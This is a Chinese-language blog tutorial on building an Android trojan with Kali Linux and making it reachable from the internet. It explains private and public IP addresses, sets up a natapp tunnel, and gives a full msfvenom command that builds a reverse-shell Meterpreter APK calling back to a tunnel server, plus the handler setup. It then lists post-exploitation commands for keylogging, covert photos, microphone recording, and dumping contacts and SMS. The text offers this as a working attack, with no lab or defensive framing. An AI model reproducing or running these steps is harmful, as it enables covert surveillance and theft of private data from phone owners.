使用kali(外网)生成木马入侵安卓手机

经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面渗透主机呢?......

这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧!

什么是内网?内网接入方式:上网的计算机得到的IP地址是Inetnet上的保留地址,保留地址有如下3种形式:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x内网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访问Internet。内网的计算机可Internet上的其他计算机发送连接请求,但Internet上其他的计算机无法向内网的计算机发送连接请求。

什么是外网(也称为公网)?使用ADSL的用户,如果只有一个用户一台计算机在使用此宽带,没有使用路由功能,而是用拨号软件直接拨号上网的,这种情况下,该用户目前所处的网络为外网,外网的用户都拥有一个属于自己的独立IP地址.公网的计算机和Internet上的其他计算机可随意互相访问。

如何判断你是网络是内网还是外网呢?输入WIN+R进去MS-DOS命令行里面,输入:ipconfig看一下自己的ip:如果你的IP地址属于保留地址(保留地址开头为:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x)那么你的计算机就是运行在局域网内。

使用natapp服务/内网穿透工具Ngrok 。

这里以natapp进行实验

你在natapp官网注册好后获得一条免费隧道,添加tcp通道,端口号自定,例如2018,ip填127.0.0.1

在linux下首先下载natapp的客户端,然后再命令行内启动natapp     语句:   ./natapp -authtoken=************       后面的星号换成自己的口令

(如果提示权限不够  chmod a+x natapp )

启动成功后可以看到下面图片

ping 一下第一个圈内的服务器 得到ip地址120.3.51.1    后面位端口号 34611

开始生成外网小马

msfvenom -p android/meterpreter/reverse_tcp LHOST=120.3.51.1 LPORT=34611 R > android_backdoor.apk

一定要注意ip和端口填服务器的

将apk文件安装到安卓手机上。

启动  msfconsole

依次输入下面的命令

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 2018

监听127.0.0.1:2018                        (内网穿透相当于先将数据发给服务器,然后由服务器发给内网中的我们 )

启动run

用你的电话卡流量试试看打开app

keyscan_start:开始键盘记录
keyscan_dump:下载键盘记录
keyscan_stop:结束键盘记录

record_mic:录制声音(如果目标主机上有话筒的话)
webcam_chat:查看摄像头接口

webcam_stream  //开启摄像头

webcam_list:查看摄像头列表
webcam_snap //隐秘拍照功能

webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的

run vnc:开启远程桌面
dump_contacts //导出电话号码
dump_sms  //导出信息
可以输入?查看更多命令

转载:https://www.cnblogs.com/jjj-fly/p/7228785.html

https://www.freebuf.com/sectool/162046.html

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 1024 设计师:白松林 返回首页